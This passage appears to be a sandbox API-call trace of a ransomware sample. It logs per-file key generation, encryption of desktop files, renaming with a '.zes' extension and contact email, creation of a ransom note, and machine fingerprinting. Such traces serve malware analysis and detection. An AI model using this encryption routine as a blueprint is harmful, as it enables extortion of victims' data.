lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.600] WriteFile (in: hFile=0x124, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.600] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.600] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.600] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x546448) returned 1 [0134.600] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.600] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.600] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x10903, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x10903, lpOverlapped=0x0) returned 1 [0134.601] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x10910, dwBufLen=0x10910 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x10910) returned 1 [0134.602] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.602] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x10910, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x10910, lpOverlapped=0x0) returned 1 [0134.602] CryptDestroyKey (hKey=0x546448) returned 1 [0134.602] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x109f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.602] SetEndOfFile (hFile=0x124) returned 1 [0134.604] GetProcessHeap () returned 0x520000 [0134.604] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.604] GetProcessHeap () returned 0x520000 [0134.604] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.604] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zgyGh8GT0arDFn7.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zgygh8gt0ardfn7.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zgyGh8GT0arDFn7.mkv.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zgygh8gt0ardfn7.mkv.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.653] CloseHandle (hObject=0x124) returned 1 [0134.653] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.653] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfbb7e70, ftCreationTime.dwHighDateTime=0x1d5e5d1, ftLastAccessTime.dwLowDateTime=0x2ed92ca0, ftLastAccessTime.dwHighDateTime=0x1d5e122, ftLastWriteTime.dwLowDateTime=0x2ed92ca0, ftLastWriteTime.dwHighDateTime=0x1d5e122, nFileSizeHigh=0x0, nFileSizeLow=0x2c92, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ZJyWQae78.bmp", cAlternateFileName="ZJYWQA~1.BMP")) returned 1 [0134.653] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZJyWQae78.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zjywqae78.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.654] GetProcessHeap () returned 0x520000 [0134.654] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.654] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.654] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.654] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0xe, lpOverlapped=0x0) returned 1 [0134.654] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x546448) returned 1 [0134.654] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.654] GetProcessHeap () returned 0x520000 [0134.654] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.654] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40) returned 1 [0134.654] CryptDestroyKey (hKey=0x546448) returned 1 [0134.654] WriteFile (in: hFile=0x124, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ffc90*=0x40, lpOverlapped=0x0) returned 1 [0134.654] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.655] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.655] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.655] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.655] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.655] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x546448) returned 1 [0134.655] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.655] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.655] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x2c92, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x2c92, lpOverlapped=0x0) returned 1 [0134.655] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x2ca0, dwBufLen=0x2ca0 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x2ca0) returned 1 [0134.655] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.655] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x2ca0, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x2ca0, lpOverlapped=0x0) returned 1 [0134.656] CryptDestroyKey (hKey=0x546448) returned 1 [0134.656] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x2d74, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.656] SetEndOfFile (hFile=0x124) returned 1 [0134.657] GetProcessHeap () returned 0x520000 [0134.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.657] GetProcessHeap () returned 0x520000 [0134.657] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.657] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZJyWQae78.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zjywqae78.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZJyWQae78.bmp.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zjywqae78.bmp.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.661] CloseHandle (hObject=0x124) returned 1 [0134.661] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.662] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfbb7e70, ftCreationTime.dwHighDateTime=0x1d5e5d1, ftLastAccessTime.dwLowDateTime=0x2ed92ca0, ftLastAccessTime.dwHighDateTime=0x1d5e122, ftLastWriteTime.dwLowDateTime=0x2ed92ca0, ftLastWriteTime.dwHighDateTime=0x1d5e122, nFileSizeHigh=0x0, nFileSizeLow=0x2c92, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ZJyWQae78.bmp", cAlternateFileName="ZJYWQA~1.BMP")) returned 0 [0134.662] GetProcessHeap () returned 0x520000 [0134.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.662] CryptImportKey (in: hProv=0x534c10, pbData=0x23ffc80, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0134.662] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588, pdwDataLen=0x23ffce8 | out: pbData=0x535588, pdwDataLen=0x23ffce8) returned 1 [0134.662] CryptDestroyKey (hKey=0x546448) returned 1 [0134.662] GetProcessHeap () returned 0x520000 [0134.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x5355d0 [0134.662] CryptImportKey (in: hProv=0x534c10, pbData=0x23ffc80, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0134.662] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5355d0, pdwDataLen=0x23ffce8 | out: pbData=0x5355d0, pdwDataLen=0x23ffce8) returned 1 [0134.662] CryptDestroyKey (hKey=0x546448) returned 1 [0134.662] GetProcessHeap () returned 0x520000 [0134.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6e0) returned 0x568740 [0134.662] CryptImportKey (in: hProv=0x534c10, pbData=0x23ffc80, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0134.662] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x568740, pdwDataLen=0x23ffce8 | out: pbData=0x568740, pdwDataLen=0x23ffce8) returned 1 [0134.662] CryptDestroyKey (hKey=0x546448) returned 1 [0134.662] wsprintfW (in: param_1=0x23fecc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\readme-warning.txt") returned 56 [0134.662] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\readme-warning.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme-warning.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.663] WriteFile (in: hFile=0x124, lpBuffer=0x568740*, nNumberOfBytesToWrite=0x6c5, lpNumberOfBytesWritten=0x23fecc0, lpOverlapped=0x0 | out: lpBuffer=0x568740*, lpNumberOfBytesWritten=0x23fecc0*=0x6c5, lpOverlapped=0x0) returned 1 [0134.664] CloseHandle (hObject=0x124) returned 1 [0134.665] GetProcessHeap () returned 0x520000 [0134.665] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x568740 | out: hHeap=0x520000) returned 1 [0134.665] GetProcessHeap () returned 0x520000 [0134.665] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5355d0 | out: hHeap=0x520000) returned 1 [0134.665] GetProcessHeap () returned 0x520000 [0134.665] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.665] FindClose (in: hFindFile=0x544b08 | out: hFindFile=0x544b08) returned 1 [0134.665] GetProcessHeap () returned 0x520000 [0134.665] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5684d8 | out: hHeap=0x520000) returned 1 Thread: id = 121 os_tid = 0x618 Thread: id = 123 os_tid = 0x6c8 Thread: id = 125 os_tid = 0x7d0 Thread: id = 126 os_tid = 0x158 Thread: id = 127 os_tid = 0x68c Thread: id = 128 os_tid = 0x690 Thread: id = 129 os_tid = 0x614 Thread: id = 130 os_tid = 0x7d8 Thread: id = 148 os_tid = 0xb54 Thread: id = 149 os_tid = 0x4e8 [0149.999] GetProcessHeap () returned 0x520000 [0149.999] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x58c1b0 [0149.999] GetProcessHeap () returned 0x520000 [0149.999] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x3f182a0 [0149.999] GetProcessHeap () returned 0x520000 [0149.999] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x57fe30 [0149.999] CryptImportKey (in: hProv=0x534c10, pbData=0x40efed0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0149.999] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x57fe30, pdwDataLen=0x40eff3c | out: pbData=0x57fe30, pdwDataLen=0x40eff3c) returned 1 [0150.000] CryptDestroyKey (hKey=0x3f43588) returned 1 [0150.000] GetProcessHeap () returned 0x520000 [0150.000] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x580958 [0150.000] CryptImportKey (in: hProv=0x534c10, pbData=0x40efed0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0150.000] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x580958, pdwDataLen=0x40eff3c | out: pbData=0x580958, pdwDataLen=0x40eff3c) returned 1 [0150.000] CryptDestroyKey (hKey=0x3f43588) returned 1 [0150.000] SetErrorMode (uMode=0x1) returned 0x1 [0150.000] GetLogicalDrives () returned 0x4 [0150.000] GetProcessHeap () returned 0x520000 [0150.000] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x3f18210 [0150.000] CryptImportKey (in: hProv=0x534c10, pbData=0x40efa48, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0150.000] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f18210, pdwDataLen=0x40efab8 | out: pbData=0x3f18210, pdwDataLen=0x40efab8) returned 1 [0150.000] CryptDestroyKey (hKey=0x3f43588) returned 1 [0150.000] GetProcessHeap () returned 0x520000 [0150.000] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x5a1318 [0150.001] CryptImportKey (in: hProv=0x534c10, pbData=0x40efa48, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0150.001] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5a1318, pdwDataLen=0x40efab8 | out: pbData=0x5a1318, pdwDataLen=0x40efab8) returned 1 [0150.001] CryptDestroyKey (hKey=0x3f43588) returned 1 [0150.001] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x40efab4 | out: phkResult=0x40efab4*=0x5f8) returned 0x0 [0150.001] RegQueryValueExA (in: hKey=0x5f8, lpValueName="ProductId", lpReserved=0x0, lpType=0x0, lpData=0x40efac0, lpcbData=0x40efabc*=0x400 | out: lpType=0x0, lpData=0x40efac0*=0x30, lpcbData=0x40efabc*=0x18) returned 0x0 [0150.001] RegCloseKey (hKey=0x5f8) returned 0x0 [0150.001] GetProcessHeap () returned 0x520000 [0150.001] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f18210 | out: hHeap=0x520000) returned 1 [0150.001] GetProcessHeap () returned 0x520000 [0150.001] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a1318 | out: hHeap=0x520000) returned 1 [0150.001] GetProcessHeap () returned 0x520000 [0150.001] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x5a1318 [0150.003] CryptImportKey (in: hProv=0x534c10, pbData=0x40ef828, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0150.003] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5a1318, pdwDataLen=0x40ef88c | out: pbData=0x5a1318, pdwDataLen=0x40ef88c) returned 1 [0150.003] CryptDestroyKey (hKey=0x3f43588) returned 1 [0150.003] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x40ef890, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0150.003] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x40ef888, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x40ef888*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0150.004] GetProcessHeap () returned 0x520000 [0150.004] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a1318 | out: hHeap=0x520000) returned 1 [0150.004] wsprintfA (in: param_1=0x40efad7, param_2="-%08X" | out: param_1="-9C354B42") returned 9 [0150.004] wsprintfW (in: param_1=0x40efee8, param_2="\\\\.\\%c:" | out: param_1="\\\\.\\C:") returned 6 [0150.004] wsprintfW (in: param_1=0x40efef8, param_2="%c:\\" | out: param_1="C:\\") returned 3 [0150.004] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.004] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x40efed8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x40efed8*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0150.004] GetProcessHeap () returned 0x520000 [0150.004] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x34) returned 0x3f43588 [0150.004] wsprintfW (in: param_1=0x3f43588, param_2="%c:" | out: param_1="C:") returned 2 [0150.004] CreateFileW (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f8 [0150.004] DeviceIoControl (in: hDevice=0x5f8, dwIoControlCode=0x560000, lpInBuffer=0x0, nInBufferSize=0x0, lpOutBuffer=0x40eff08, nOutBufferSize=0x20, lpBytesReturned=0x40efedc, lpOverlapped=0x0 | out: lpOutBuffer=0x40eff08*, lpBytesReturned=0x40efedc*=0x20, lpOverlapped=0x0) returned 1 [0150.005] CloseHandle (hObject=0x5f8) returned 1 [0150.005] GetProcessHeap () returned 0x520000 [0150.005] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x58c440 [0150.005] GetProcessHeap () returned 0x520000 [0150.005] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2c) returned 0x3f54370 [0150.005] CryptGenRandom (in: hProv=0x534c10, dwLen=0x20, pbBuffer=0x3f5437c | out: pbBuffer=0x3f5437c) returned 1 [0150.005] GetProcessHeap () returned 0x520000 [0150.005] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2c) returned 0x3f54338 [0150.005] CryptGenRandom (in: hProv=0x534c10, dwLen=0x20, pbBuffer=0x3f54344 | out: pbBuffer=0x3f54344) returned 1 [0150.005] GetProcessHeap () returned 0x520000 [0150.005] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x5a1318 [0150.005] CryptImportKey (in: hProv=0x534c10, pbData=0x40efec8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43508) returned 1 [0150.005] CryptDecrypt (in: hKey=0x3f43508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5a1318, pdwDataLen=0x40eff30 | out: pbData=0x5a1318, pdwDataLen=0x40eff30) returned 1 [0150.005] CryptDestroyKey (hKey=0x3f43508) returned 1 [0150.005] GetProcessHeap () returned 0x520000 [0150.005] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x57feb8 [0150.005] GetProcessHeap () returned 0x520000 [0150.005] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x5809e0 [0150.006] CryptImportKey (in: hProv=0x534c10, pbData=0x536998, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0x40eff10 | out: phKey=0x40eff10*=0x3f43508) returned 1 [0150.006] CryptEncrypt (in: hKey=0x3f43508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x57feb8*, pdwDataLen=0x40eff14*=0x75, dwBufLen=0x80 | out: pbData=0x57feb8*, pdwDataLen=0x40eff14*=0x80) returned 1 [0150.006] CryptDestroyKey (hKey=0x3f43508) returned 1 [0150.006] CryptImportKey (in: hProv=0x534c10, pbData=0x536998, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0x40eff10 | out: phKey=0x40eff10*=0x3f43508) returned 1 [0150.006] CryptEncrypt (in: hKey=0x3f43508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5809e0*, pdwDataLen=0x40eff14*=0x75, dwBufLen=0x80 | out: pbData=0x5809e0*, pdwDataLen=0x40eff14*=0x80) returned 1 [0150.006] CryptDestroyKey (hKey=0x3f43508) returned 1 [0150.006] GetProcessHeap () returned 0x520000 [0150.006] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a1318 | out: hHeap=0x520000) returned 1 [0150.006] GetProcessHeap () returned 0x520000 [0150.006] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x5a1318 [0150.006] CryptImportKey (in: hProv=0x534c10, pbData=0x40efea8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43508) returned 1 [0150.006] CryptDecrypt (in: hKey=0x3f43508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5a1318, pdwDataLen=0x40eff10 | out: pbData=0x5a1318, pdwDataLen=0x40eff10) returned 1 [0150.006] CryptDestroyKey (hKey=0x3f43508) returned 1 [0150.006] GetProcessHeap () returned 0x520000 [0150.006] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x3f16530 [0150.006] CryptImportKey (in: hProv=0x534c10, pbData=0x40efea8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43508) returned 1 [0150.006] CryptDecrypt (in: hKey=0x3f43508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f16530, pdwDataLen=0x40eff10 | out: pbData=0x3f16530, pdwDataLen=0x40eff10) returned 1 [0150.006] CryptDestroyKey (hKey=0x3f43508) returned 1 [0150.006] GetProcessHeap () returned 0x520000 [0150.006] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x3f16c60 [0150.006] CryptImportKey (in: hProv=0x534c10, pbData=0x40efea8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43508) returned 1 [0150.007] CryptDecrypt (in: hKey=0x3f43508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f16c60, pdwDataLen=0x40eff10 | out: pbData=0x3f16c60, pdwDataLen=0x40eff10) returned 1 [0150.007] CryptDestroyKey (hKey=0x3f43508) returned 1 [0150.007] GetProcessHeap () returned 0x520000 [0150.007] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x3f18210 [0150.007] CryptImportKey (in: hProv=0x534c10, pbData=0x40efea8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43508) returned 1 [0150.007] CryptDecrypt (in: hKey=0x3f43508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f18210, pdwDataLen=0x40eff10 | out: pbData=0x3f18210, pdwDataLen=0x40eff10) returned 1 [0150.007] CryptDestroyKey (hKey=0x3f43508) returned 1 [0150.007] GetProcessHeap () returned 0x520000 [0150.007] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10838) returned 0x3f688d8 [0150.007] GetProcessHeap () returned 0x520000 [0150.007] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x40f0020 [0150.008] wsprintfW (in: param_1=0x3f7890a, param_2=".[%08X].[%s].%s" | out: param_1=".[4B2E4630].[johncastle@msgsafe.io].zes") returned 39 [0150.008] GetProcessHeap () returned 0x520000 [0150.008] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10058) returned 0x3f79118 [0150.009] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4027f0, lpParameter=0x3f688d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f8 [0150.009] WaitForSingleObject (hHandle=0x5f8, dwMilliseconds=0xffffffff) returned 0x0 [0150.035] CloseHandle (hObject=0x5f8) returned 1 [0150.035] GetProcessHeap () returned 0x520000 [0150.035] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x40f0020 